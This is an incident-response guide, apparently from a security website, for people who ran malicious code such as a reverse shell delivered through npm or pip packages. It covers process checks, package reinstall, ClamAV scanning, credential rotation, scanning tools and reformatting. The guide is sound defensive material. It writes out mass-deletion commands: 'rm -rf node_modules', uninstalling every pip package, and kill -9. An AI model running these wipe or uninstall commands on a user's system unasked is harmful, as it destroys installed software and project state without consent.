back

Incident Response

What to do if you ran malicious code

Immediate Actions

1

Disconnect from the Internet

Pull the ethernet cable. Turn off Wi-Fi. Stop the bleeding before cleanup. The reverse shell reconnects every 5 seconds.

2

Check running processes

Run ps aux | grep node on macOS/Linux or open Task Manager on Windows. Look for unknown Node.js processes, especially ones with network connections.

3

Kill suspicious processes

Kill any unknown node, python, or shell processes. On macOS/Linux: kill -9 <PID>. On Windows: taskkill /F /PID <PID>.

Cleanup Steps

Remove compromised Node.js packages

Delete node_modules and lockfile, then reinstall from clean state.

rm -rf node_modules package-lock.json && npm install

Remove compromised Python packages

Uninstall all pip packages and reinstall from requirements.

pip freeze | xargs pip uninstall -y

Scan with ClamAV

Open-source antivirus that detects known malware signatures.

brew install clamav && freshclam && clamscan -r ~/

Review shell history

Check if the malware executed additional commands via your shell.

cat ~/.bash_history ~/.zsh_history | tail -100

Credential Rotation (Critical)

Assume EVERYTHING was stolen. Rotate all credentials immediately.

All passwords

Every password stored in browsers, password managers, and config files. Assume they were all exfiltrated.

All API keys

AWS, GCP, Azure, Stripe, OpenAI, Vercel, Netlify, Supabase — every service you use.

SSH keys

Generate new SSH keys. Remove old public keys from GitHub, servers, and cloud providers.

Browser stored credentials

Clear all saved passwords in Chrome, Firefox, Brave, Edge. Enable 2FA everywhere.

Crypto wallets

Create a NEW wallet. Transfer all funds immediately. The old wallet seed phrase is compromised.

2FA tokens / TOTP secrets

If TOTP secrets were stored locally, regenerate them. Prefer hardware security keys.

Recommended Security Tools

Codebase Scanner

Scans repos for malware patterns, obfuscation, and suspicious dependencies.

njsscan

Static analysis security tool for Node.js applications.

npm audit / yarn audit

Built-in vulnerability scanning for Node.js dependencies.

eslint-plugin-security

ESLint rules to detect insecure patterns like eval(), Function(), exec().

lockfile-lint

Lint lockfiles to detect malicious packages and registry manipulation.

package-checker

Check npm packages for suspicious patterns before installing.

de4js

JavaScript deobfuscation tool. Useful for analyzing minified/encoded payloads.

Snyk

Commercial vulnerability scanner with free tier. Integrates with CI/CD.

GitGuardian

Scans for leaked secrets in Git history. Free for personal repos.

pip-audit

Audit Python dependencies for known vulnerabilities.

bandit

Security linter for Python code. Detects common security issues.

safety

Check Python dependencies against the Safety vulnerability database.

Nuclear Option

If you suspect deep compromise (persistent backdoor, rootkit, firmware modification), the only safe option is a full OS reformat. Back up important files to an external drive (scan them first), then wipe and reinstall your operating system from scratch.

Reformat → Reinstall OS → Rotate ALL credentials → Restore from clean backup